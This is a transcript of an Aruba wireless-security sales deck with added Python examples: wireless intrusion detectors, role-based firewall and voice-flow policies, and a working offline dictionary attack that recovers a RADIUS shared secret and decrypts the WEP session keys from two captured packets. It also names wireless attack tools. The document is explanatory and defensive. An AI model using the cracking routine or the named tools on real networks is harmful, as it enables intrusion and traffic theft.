Getting Smart About Wireless Security
Presentation transcript (47 slides; uploaded by akando)
The Existence of Wireless LANs is a Security Threat – A Case Study

[Diagram: New York City; your company; your employee]

  • Employee is a subscriber to a public Wi-Fi hotspot service
  • Employee's laptop automatically associates with the public Wi-Fi hotspot
  • The same laptop is plugged into the wired corporate network
  • Traffic is bridged between the public hotspot and the enterprise network: anyone on the hotspot now has a path onto the corporate LAN that never crosses the perimeter firewall
Mobility Is An Interior Security Threat: Conventional Perimeter Security Has Been Rendered Irrelevant
  • Wireless LAN technology is a wired security threat
  • New mobile users, devices appearing everyday
  • Traditional security products do not work for mobility
    • Insecure, poor performance, expensive, breaks mobility
  • Security needs to be addressed from the inside out
Aruba Solution: Internal Mobile Security: Conventional Perimeter Security Has Been Rendered Irrelevant

  1. LOCK THE AIR
  2. LOCK THE WIRE
  3. LOCK THE USER
  4. LOCK THE DEVICE
  5. LOCK THE RESOURCES

Aruba At A Glance: At the Intersection of Mobility, Wireless and Security
  • Founded: February, 2002
  • Investors: Sequoia, Matrix, Trinity, WK Technology
  • Funding: $77M To-Date , Nearing Profitability
  • Traction: Hundreds of Major Customers
  • Employees: 130
  • Patents: Multiple Key Patents
  • Industry Recognition:
Aruba's Centralized Security Solutions: Security from the Inside Out

[Diagram: corporate network with employees, visitors and voice users; Internet access, VoIP services, open ports, a guest laptop, email/web/storage servers and OSDP partners, all over the IP transport]

  • Lock the air
  • Easy deployment of a secure WLAN
  • Plug holes in exposed WLANs
  • Protect users, devices and networks from worms and viruses
  • Create and enforce corporate policies
  • Defend exposed wired ports

How It's Deployed: Non-disruptive to Existing Network

[Diagram: data center deployment and wiring closet deployment side by side, each showing Floor 1, Floor 2, Data Center and Backbone with 10/100 Mbps links; Aruba 2400, Aruba 800 and Aruba 5000 switches shown]

Intrusion Detection and Prevention

Hackers can trap users, grab data and pretend to be valid users.

Wireless Intrusion Detection
A Myriad of Intrusion Tools / Techniques
  • Monkey Jack, ESSID Jack, WLAN Jack, AirJack
  • Associate Flood, Auth Flood, DeAuth Flood, FakeAP Flood
  • Void 11
  • Wellenreiter, KISMET
  • ASLEAP
  • HostAP
  • Ttcp-WiFi
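How a wireless IDS would catch three of the attack classes listed above (de-authentication floods, FakeAP beacon floods and authentication floods) from decoded management frames, as an added example that is not part of the deck and not Aruba's detection code. The frames, MAC addresses and thresholds are constructed for this illustration; real deployments tune the thresholds per channel and site.

```python
"""Sliding-window detectors for three attack classes: de-authentication floods
(DeAuth Flood / Void 11 style), fake-AP beacon floods and authentication /
association floods.  Input is a list of decoded 802.11 management-frame
summaries; the sample capture at the bottom is constructed for this example
and the thresholds are assumptions, not vendor defaults."""
from collections import defaultdict, deque

WINDOW_SECONDS = 1.0           # trailing window all three detectors evaluate over
DEAUTH_FLOOD_THRESHOLD = 10    # deauth/disassoc frames from one transmitter
FAKEAP_FLOOD_THRESHOLD = 20    # distinct BSSIDs seen beaconing
AUTH_FLOOD_THRESHOLD = 30      # distinct client addresses authenticating to one BSSID


class WindowCounter:
    """Per-key count of distinct items inside a trailing time window."""

    def __init__(self, window):
        self.window = window
        self.events = defaultdict(deque)          # key -> deque of (ts, item)

    def add(self, key, ts, item):
        q = self.events[key]
        q.append((ts, item))
        while q and ts - q[0][0] > self.window:   # expire events that left the window
            q.popleft()
        return len({i for _, i in q})


def detect(frames, window=WINDOW_SECONDS):
    """Return one alert dict per (alert, subject) pair, in order of first detection.
    Each frame is a dict with ts, subtype, src and bssid."""
    deauth, beacons, auth = (WindowCounter(window) for _ in range(3))
    alerts, fired = [], set()
    for n, f in enumerate(sorted(frames, key=lambda x: x["ts"])):
        ts, sub = f["ts"], f["subtype"]
        if sub in ("deauth", "disassoc"):
            # n is unique per frame, so the distinct count is a plain frame count
            hit = (deauth.add(f["src"], ts, n), DEAUTH_FLOOD_THRESHOLD,
                   "deauth_flood", f["src"])
        elif sub == "beacon":
            hit = (beacons.add("air", ts, f["bssid"]), FAKEAP_FLOOD_THRESHOLD,
                   "fakeap_flood", "air")
        elif sub in ("auth", "assoc_req"):
            hit = (auth.add(f["bssid"], ts, f["src"]), AUTH_FLOOD_THRESHOLD,
                   "auth_flood", f["bssid"])
        else:
            continue
        count, limit, name, subject = hit
        if count >= limit and (name, subject) not in fired:
            fired.add((name, subject))
            alerts.append({"ts": ts, "alert": name, "subject": subject, "count": count})
    return alerts


def benign_frames(seconds=3, aps=("00:0b:86:00:00:01", "00:0b:86:00:00:02",
                                  "00:0b:86:00:00:03")):
    """Constructed background: three legitimate APs beaconing every 100 ms."""
    return [{"ts": t / 10, "subtype": "beacon", "src": ap, "bssid": ap}
            for t in range(seconds * 10) for ap in aps]


def attack_frames():
    """Constructed attack traffic layered on top of the background."""
    real_ap = "00:0b:86:00:00:01"
    frames = []
    # 25 spoofed de-auths "from" the real AP in half a second
    frames += [{"ts": 1.0 + i * 0.02, "subtype": "deauth", "src": real_ap,
                "bssid": real_ap} for i in range(25)]
    # 40 beacons from 40 never-before-seen BSSIDs in 400 ms (FakeAP)
    frames += [{"ts": 2.0 + i * 0.01, "subtype": "beacon",
                "src": f"02:00:00:00:00:{i:02x}", "bssid": f"02:00:00:00:00:{i:02x}"}
               for i in range(40)]
    # 50 authentication requests from 50 distinct client MACs to the real AP in 300 ms
    frames += [{"ts": 2.5 + i * 0.006, "subtype": "auth",
                "src": f"06:00:00:00:00:{i:02x}", "bssid": real_ap} for i in range(50)]
    return frames


if __name__ == "__main__":
    for alert in detect(benign_frames() + attack_frames()):
        print(alert)
```

The background alone produces no alerts; with the attack frames mixed in, the three detectors fire once each, in the order the attacks start. A production sensor would also key the beacon counter by channel and whitelist the BSSIDs it manages.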
Aruba Solution: Internal Mobile Security: Defense In Depth: Locking Down In Layers

Getting Your RADIUS Password is Simple
  • Hacker finds a rogue access point before you do
  • Uses ARP poisoning to sniff all the traffic between the AP and the gateway
  • Sends a de-authentication packet to a client
  • Client automatically re-authenticates
  • AP sends an Access-Request to the RADIUS server; the server answers with an Access-Challenge
  • With just 2 packets and less than 1 second with a rogue AP, a hacker can perform an offline dictionary attack on your RADIUS server shared secret: the Response Authenticator is an MD5 over packet fields that are all visible on the wire plus the secret, so every candidate secret can be tested without touching the server again
  • How safe are your RADIUS passwords?

[Diagram: rogue AP, de-auth to the client, Access Request and Access Challenge exchanged with the RADIUS server]

So Is Getting ALL Your Data
  • Client finishes authentication and the AP sends the request to the RADIUS server
  • RADIUS server accepts the user (Access-Accept) and passes the encrypted keys to the AP
  • Since the hacker will find out your RADIUS password, they will know your dynamic WEP keys too: the keys in the Access-Accept are protected only by the shared secret and the Request Authenticator that was already captured
  • With your WEP keys, all traffic can be sniffed directly
  • How safe is your data?
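The two slides above describe the same weakness twice: first the shared secret, then the keys it protects. The following added example (not from the deck, not Aruba code) shows why two captured packets are enough, using the RFC 2865 Response Authenticator and the RFC 2548 MS-MPPE key encryption exactly as specified. The secret, the wordlist, the Request Authenticator and the key values are constructed for the example; the packet-building functions exist only so the attacker side can be exercised offline against a known-good packet.

```python
"""Why a captured Access-Request / Access-Accept pair is enough.  The Response
Authenticator (RFC 2865) is MD5 over fields visible on the wire plus the shared
secret, so candidates can be tested offline; the MS-MPPE-Send/Recv-Key
attributes (RFC 2548) carrying the session keys are encrypted with
MD5(secret + Request Authenticator + salt), so the recovered secret unwraps them.
Secret, wordlist, authenticator and key bytes below are constructed."""
import hashlib
import struct

MS_VENDOR_ID = 311
MS_MPPE_SEND_KEY, MS_MPPE_RECV_KEY = 16, 17
ACCESS_ACCEPT = 2


def response_authenticator(code, ident, attrs, request_auth, secret):
    """RFC 2865 s.3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def mppe_key_encrypt(key, secret, request_auth, salt):
    """RFC 2548 s.2.4.2: salt || (len || key || pad) XORed with chained MD5 blocks."""
    plain = bytes([len(key)]) + key
    plain += b"\x00" * (-len(plain) % 16)
    out, b = b"", hashlib.md5(secret + request_auth + salt).digest()
    for i in range(0, len(plain), 16):
        c = bytes(p ^ k for p, k in zip(plain[i:i + 16], b))
        out += c
        b = hashlib.md5(secret + c).digest()     # next keystream block from ciphertext
    return salt + out


def mppe_key_decrypt(blob, secret, request_auth):
    salt, cipher = blob[:2], blob[2:]
    plain, b = b"", hashlib.md5(secret + request_auth + salt).digest()
    for i in range(0, len(cipher), 16):
        c = cipher[i:i + 16]
        plain += bytes(x ^ k for x, k in zip(c, b))
        b = hashlib.md5(secret + c).digest()
    return plain[1:1 + plain[0]]                  # first byte is the key length


def vsa(vendor_type, value):
    """Wrap a Microsoft vendor attribute in a RADIUS Vendor-Specific (26) attribute."""
    inner = struct.pack("!BB", vendor_type, 2 + len(value)) + value
    body = struct.pack("!I", MS_VENDOR_ID) + inner
    return struct.pack("!BB", 26, 2 + len(body)) + body


def ms_mppe_keys(attrs):
    """Return {vendor_type: encrypted blob} for the MS-MPPE key attributes present."""
    found, i = {}, 0
    while i < len(attrs):
        t, length = attrs[i], attrs[i + 1]
        if t == 26 and struct.unpack("!I", attrs[i + 2:i + 6])[0] == MS_VENDOR_ID:
            found[attrs[i + 6]] = attrs[i + 8:i + length]
        i += length
    return found


def build_access_accept(ident, request_auth, secret, send_key, recv_key):
    """What the RADIUS server puts on the wire after a successful EAP exchange."""
    attrs = vsa(MS_MPPE_SEND_KEY, mppe_key_encrypt(send_key, secret, request_auth, b"\x80\x01"))
    attrs += vsa(MS_MPPE_RECV_KEY, mppe_key_encrypt(recv_key, secret, request_auth, b"\x80\x02"))
    auth = response_authenticator(ACCESS_ACCEPT, ident, attrs, request_auth, secret)
    return struct.pack("!BBH", ACCESS_ACCEPT, ident, 20 + len(attrs)) + auth + attrs


def recover_shared_secret(request_auth, response, wordlist):
    """Offline dictionary attack: the first candidate that reproduces the
    Response Authenticator is the shared secret.  None if nothing matches."""
    code, ident, length = struct.unpack("!BBH", response[:4])
    resp_auth, attrs = response[4:20], response[20:length]
    for candidate in wordlist:
        if response_authenticator(code, ident, attrs, request_auth, candidate) == resp_auth:
            return candidate
    return None


def demo():
    """Constructed exchange: a server using the secret b'aruba123' hands the AP
    two 104-bit WEP keys; the attacker holds only the two packets and a wordlist."""
    secret, request_auth = b"aruba123", bytes(range(16))
    send_key, recv_key = bytes(range(1, 14)), bytes(range(101, 114))
    accept = build_access_accept(7, request_auth, secret, send_key, recv_key)
    wordlist = [b"password", b"radius", b"testing123", b"aruba123", b"secret"]
    found = recover_shared_secret(request_auth, accept, wordlist)
    if found is None:
        return None, {}
    code, ident, length = struct.unpack("!BBH", accept[:4])
    keys = {vt: mppe_key_decrypt(blob, found, request_auth)
            for vt, blob in ms_mppe_keys(accept[20:length]).items()}
    return found, keys
```

The same `response_authenticator` routine is the check an AP or switch should run on every response it receives; the attack is only the same check run against a list of candidates, which is why a short, dictionary-word shared secret is the whole problem.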

safety with aruba rogue prevention
Safety with Aruba (Rogue Prevention)
  • AP detection
    • See all APs
  • AP classification
    • Are they neighbors?
    • Or are they a threat?
  • Rogue destruction
    • Stop users from accessing rogue APs and leave neighbors alone
Safety with Aruba (Centralized Encryption)
  • Client finishes authentication and the AP sends the wireless packet to the switch
  • The switch sends an Access-Request to the RADIUS server
  • The RADIUS server sends the Access-Accept and the encrypted keys to the switch
  • All encryption is processed centrally; NO keys are distributed to APs
  • Your keys never leave the data center

Aruba Solution: Internal Mobile Security: Defense In Depth: Locking Down In Layers

Authenticating The User (802.1X)

[Diagram: contractor and employee stations running an 802.1X supplicant, the 802.1X authenticator, and the authentication server]

  • 802.1X support for explicit and stateful modes
  • 802.11 Encryption
    • WEP -- static and 802.1X dynamic WEP
    • TKIP
    • AES
  • 802.11 Authentication methods
    • EAP-PEAP (Cisco and Microsoft versions)
    • EAP-LEAP (Cisco); note that LEAP is the method the ASLEAP tool listed earlier breaks with an offline dictionary attack on the captured challenge/response
    • EAP-TLS & EAP-TTLS
  • Extensive support for 3rd party authentication servers

other authentication methods
Other Authentication Methods
  • For Fat and Thin APs:
    • Wireless VPNs
    • Captive Portal/Web Authentication
    • Stateful 802.1X Authentication (For Fat APs)
    • MAC Authentication (For Dumb Devices)
Wireless VPNs (Layer 3) From the DMZ to the Intranet

[Diagram: wireless VPN terminated in the DMZ, between the Internet and the intranet]

  • Enterprises have sacrificed scalability for security
  • Mobility limited to a single VLAN

Wireless VPNs: Mobility Mandates New Model To Ensure Privacy

  RAS VPNs             WLAN VPNs
  Remote access        Internal access
  Low speed (Mbps)     High speed (Gbps)
  Fixed user           Mobile user
  VPN client           VPN dialer

rsa certification for 2 factor authentication
RSA Certification for 2-factor Authentication
  • Industry’s most prestigious security certification for two-factor authentication
  • Aruba extends certification with SecurID caching
  • Critical in environments where two-factor authentication is mandated
  • 365/24/7 RSA support for customers using tokens on Aruba products
Aruba Solution: Internal Mobile Security: Defense In Depth: Locking Down In Layers

Dual Stage Authentication: Ensures Only Authorized Devices Can Be Used to Access Network

[Diagram: a corporate laptop (PASS) and a personal laptop (FAIL) presenting the same username and password to RADIUS and the domain controller]

  • Aruba enforces machine authentication before user authentication
  • If the device cannot be authenticated, Aruba denies the user(s) access or places them in a restricted role even if a valid username and password have been provided
  • Ideal for protecting against personal computers that are likely to be infected with viruses

What's Device Remediation?

[Diagram: the same corporate employee on two devices]

  • Ensuring endpoint integrity through automatic security checks
  • Protecting the network from viruses by requiring stations to pass pre-defined security policies before entering the network
    • Pass = network access
    • Fail = redirection to URL for remediation
  • Reduces enterprise exposure to security vulnerabilities and targeted attacks
Device Remediation with Zone Labs

[Diagram: station with a Zone Integrity client and MSFT 802.1x supplicant; Funk SBR 802.1x authentication server; Zone Labs Integrity server; outcomes Healthy and Quarantine]

  1. Pre-defined security policies defined at Zone Integrity server
  2. Upon entering network, user authentication, via 802.1X, is initiated
  3. Once authenticated, users are sent to Zone Labs Integrity server for security testing
  4. If user passes security checks, network access is allowed. If user fails, Aruba Wi-Fi switch redirects to URL for remediation or firewalls user into group with restricted access

other remediation partnerships
Other Remediation Partnerships
  • Sygate
  • Infoexpress (in progress)
  • Senforce (in progress)
Aruba Solution: Internal Mobile Security: Defense In Depth: Locking Down In Layers

Locking the Resources: What Does It Mean?

[Diagram: corporate network with employees, visitors and voice; Internet access and VoIP services over the IP transport; centralized wireless LAN security with programmable access points]

  • Enable Secure Network Access Based On [Who, What, When, Where, How]
Step 1: Role-based Separation

[Diagram: an Aruba access point advertising Virtual AP 1 (SSID: CORP) and Virtual AP 2 (SSID: GUEST); an Aruba WLAN switch with firewall, captive portal and DHCP pool; RADIUS server; layer 2 switch, router and default VLAN. Users are separated into trusted user on trusted host, trusted user on un-trusted host, un-trusted user, and guest user]
step 2 stateful traffic policies
Step 2: Stateful Traffic Policies
  • Built-in ICSA Certified Stateful Firewall
  • Brings Application Awareness
Result: Integrated Mobile Security: Mobile Security Policies based on {Who, What, When, Where, How}

[Diagram: the same user, John Doe, seen from Subnet A and Subnet B of the wired intranet]

  USERNAME          John Doe                          John Doe
  PASSWORD          <Cached Identity>                 <One Time Password>
  ROLE              Employee                          Employee
  AUTHENTICATION    RSA SecurID                       RSA SecurID
  FIREWALL POLICY   Don't allow on Finance Subnets    Don't allow on Finance Subnets
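How dual-stage authentication and role-based policy fit together, as an added example that is not from the deck and not Aruba's firewall: machine authentication decides the role before the user's credentials are considered, and the role selects an ordered rule set that is evaluated statefully. The role names, the finance subnet, the remediation server address and the rules themselves are assumptions made for this illustration.

```python
"""Role assignment from dual-stage (machine, then user) authentication, and a
small stateful packet filter whose rules are selected by the resulting role.
Role names, subnets and rules are assumptions made for this example."""
from ipaddress import ip_address, ip_network

ANY = ip_network("0.0.0.0/0")
FINANCE_SUBNETS = [ip_network("10.20.0.0/16")]          # assumed
REMEDIATION_SERVER = [ip_network("10.1.1.50/32")]       # assumed
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def assign_role(machine_auth_ok, user):
    """user is None (no user authentication yet) or (username, group).
    Machine authentication is decided first: a valid user on a device that did
    not pass machine authentication gets the restricted role, never the role
    the user would otherwise earn."""
    if user is None:
        return "logon" if machine_auth_ok else "guest"   # guest lands on the captive portal
    if not machine_auth_ok:
        return "restricted"
    _, group = user
    return group if group in ("employee", "contractor") else "restricted"


# Ordered per-role rules, first match wins: (action, destination networks, proto, dport).
# None matches any protocol / port.  Every role ends in an implicit deny.
POLICIES = {
    "employee":   [("deny",  FINANCE_SUBNETS, None, None),
                   ("allow", [ANY], None, None)],
    "contractor": [("deny",  FINANCE_SUBNETS, None, None),
                   ("allow", [ANY], "udp", 53),
                   ("allow", [ANY], "tcp", 443)],
    "restricted": [("allow", REMEDIATION_SERVER, "tcp", 443)],
    "logon":      [("allow", [ANY], "udp", 53)],
    "guest":      [("deny",  RFC1918, None, None),
                   ("allow", [ANY], "udp", 53),
                   ("allow", [ANY], "tcp", 80),
                   ("allow", [ANY], "tcp", 443)],
}


class StatefulRoleFirewall:
    def __init__(self, policies):
        self.policies = policies
        self.sessions = set()        # 5-tuples of flows an allow rule admitted

    def permits(self, role, src, sport, dst, dport, proto):
        """Decision for one packet.  Return traffic of an admitted session passes
        without consulting the rules; that is what 'stateful' buys you."""
        if (dst, dport, src, sport, proto) in self.sessions:
            return True
        d = ip_address(dst)
        for action, nets, rproto, rport in self.policies[role]:
            if (any(d in n for n in nets) and rproto in (None, proto)
                    and rport in (None, dport)):
                if action == "allow":
                    self.sessions.add((src, sport, dst, dport, proto))
                    return True
                return False
        return False                                        # implicit deny


if __name__ == "__main__":
    fw = StatefulRoleFirewall(POLICIES)
    role = assign_role(False, ("jdoe", "employee"))        # valid user, personal laptop
    print(role, fw.permits(role, "10.50.0.9", 50000, "10.30.1.1", 445, "tcp"))
    role = assign_role(True, ("jdoe", "employee"))         # same user, corporate laptop
    print(role, fw.permits(role, "10.50.0.9", 50001, "10.30.1.1", 445, "tcp"))
```

The two `print` lines show the deck's point: the same username and password yield `restricted` (file-server access denied) on the unauthenticated device and `employee` (allowed) on the corporate one, while finance subnets stay off limits for both.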

vowlan security issues
VoWLAN Security Issues
  • All 802.11 DoS/MITM attacks apply to voice
  • VOIP devices don’t use latest encryption or authentication methods
  • MAC-based authentication can be compromised
  • Handsets can be stolen/hijacked
  • SSIDs set aside for voice can be accessed
Weak Voice without Aruba
  • Hacker discovers "Voice" SSID, cracks WEP key
  • Spoofs MAC address to gain access

[Diagram: ESSID=Voice, WEP]
strong voice with voice flow classification
Strong Voice With Voice Flow Classification
  • Voice policies can be created that only allow specific traffic types (eg. SVP or SIP) while denying all others
  • If unauthorized traffic is discovered the station can be automatically blacklisted
Voice Flow Classification Technology
  • Uniquely identifies, classifies and prioritizes voice traffic
  • Based on Aruba's user-aware stateful firewall engine
  • Pre-configured support for Voice Protocols
    • Spectralink Voice Priority (SVP)
    • Session Initiation Protocol (SIP)
    • H.323
  • Voice traffic from a PDA or laptop can now be automatically identified, classified and prioritized

[Diagram: DATA and VOICE traffic separated]
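Voice flow classification with automatic blacklisting, as an added example that is not the deck's or Aruba's code: a station in the voice role may only speak the voice protocols listed above (plus the DNS and DHCP a handset needs), and the first non-voice flow blacklists it, which is what stops the spoofed-MAC attacker from the "Weak Voice" slide. The protocol and port numbers are the standard assignments; the RTP port range, DSCP marks, MAC addresses and sample flows are assumptions.

```python
"""Voice flow classification for stations in a voice role: recognised voice
protocols are permitted and marked for priority, anything else is denied and
the station is blacklisted.  SVP is IP protocol 119, SIP uses port 5060,
H.323 uses 1719 (RAS) and 1720 (call signaling); the RTP range, DSCP values
and the flows in demo() are assumptions for this example."""
from collections import namedtuple

Flow = namedtuple("Flow", "station proto sport dport")   # station = client MAC
TCP, UDP, SVP = 6, 17, 119
RTP_PORTS = range(16384, 32768)           # assumed negotiated media range
INFRA = {(UDP, 53), (UDP, 67)}            # DNS and DHCP a handset needs anyway


def classify(flow):
    """Return (class, dscp) for a recognised voice flow, else None."""
    if flow.proto == SVP:
        return "svp", 46
    if flow.proto in (UDP, TCP) and 5060 in (flow.sport, flow.dport):
        return "sip-signaling", 26
    if flow.proto == TCP and 1720 in (flow.sport, flow.dport):
        return "h323-signaling", 26
    if flow.proto == UDP and 1719 in (flow.sport, flow.dport):
        return "h323-ras", 26
    if flow.proto == UDP and flow.sport in RTP_PORTS and flow.dport in RTP_PORTS:
        return "rtp-media", 46
    return None


class VoicePolicy:
    def __init__(self):
        self.blacklist = set()
        self.events = []          # (station, proto, dport) that triggered a blacklist

    def check(self, flow):
        """Return ('allow', class, dscp); ('blacklist', None, None) on the first
        non-voice flow from a station; ('drop', None, None) once blacklisted."""
        if flow.station in self.blacklist:
            return "drop", None, None
        if (flow.proto, flow.dport) in INFRA:
            return "allow", "infra", 0
        cls = classify(flow)
        if cls is not None:
            return ("allow",) + cls
        self.blacklist.add(flow.station)
        self.events.append((flow.station, flow.proto, flow.dport))
        return "blacklist", None, None


def demo():
    """Constructed traffic: a real handset, and a station that joined the voice
    SSID with a spoofed MAC and then tries SMB against a file server."""
    policy = VoicePolicy()
    decisions = [policy.check(f) for f in (
        Flow("00:90:7a:00:00:01", UDP, 5060, 5060),
        Flow("00:90:7a:00:00:01", UDP, 20000, 20002),
        Flow("00:90:7a:00:00:02", UDP, 5060, 5060),   # spoofed MAC, looks like a phone
        Flow("00:90:7a:00:00:02", TCP, 44444, 445),   # ... until it speaks SMB
        Flow("00:90:7a:00:00:02", UDP, 5060, 5060),   # now dropped, even valid SIP
    )]
    return decisions, sorted(policy.blacklist)


if __name__ == "__main__":
    for decision in demo()[0]:
        print(decision)
```

The point of the last two flows: MAC authentication let the spoofed station in, but the first packet that is not SIP, H.323, SVP or media gets it blacklisted, and its later SIP traffic is dropped as well.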

Security TCO: Solving Costly Integration

[Diagram: Internet, intranet, firewall, VPN concentrator, wireless manager, wireless IDS and RF sniffers as separate boxes, with costs shown as $9K, $20K, $40K, $49K and $84K]

  • Start with a LAN
  • Add APs and wireless users
  • Add a firewall to isolate wireless from wired
  • Plus a VPN server to protect wireless traffic
  • And something to manage the APs
  • What about wireless intruders?
  • Aruba APs also function as sniffers
  • Aruba's WLAN system integrates a firewall
  • …and a VPN concentrator
  • …and wireless intrusion protection
  • …and RF management and optimization
  • …and centralized management and policy controls

Extending to Open Wired Ports: Mobile Security from the Inside Out for Wired and Wireless

[Diagram: corporate network with employees, visitors and voice; Internet access and VoIP services over the IP transport; a centralized security system covering open wired ports]

  • Extend Policies To All Open Ports Based On [Who, What, Where, When, How]

A Complete Wi-Fi System in a Single, Scalable Network Platform: From System Integration to an Integrated System

[Diagram: Aruba 2400 and Aruba 800 integrated switches for wireless and security, with remote manageability; integrated functions: firewall, VPN gateway, wireless intrusion detection, distributed wireless sniffers, RF spectrum management, voice]
Purpose-Built for Wireless Security Processing: Unique Architecture Enables New Wireless Applications

[Diagram: wireless control processor, wireless packet processor and wireless security processor on top of an L2/L3 switch with Serial & Power over Ethernet (SPOE)]

Why Aruba? Cheaper, Faster, Better
  • Dense deployments
  • Centralized radio calibration
  • High-performance switching
  • Real-time air monitoring and performance optimization
  • Centralized switching, thin APs
  • Dynamic AP management
  • Out-of-ceiling deployment
  • Enterprise-class switching platform
  • Programmable APs
  • Modular software architecture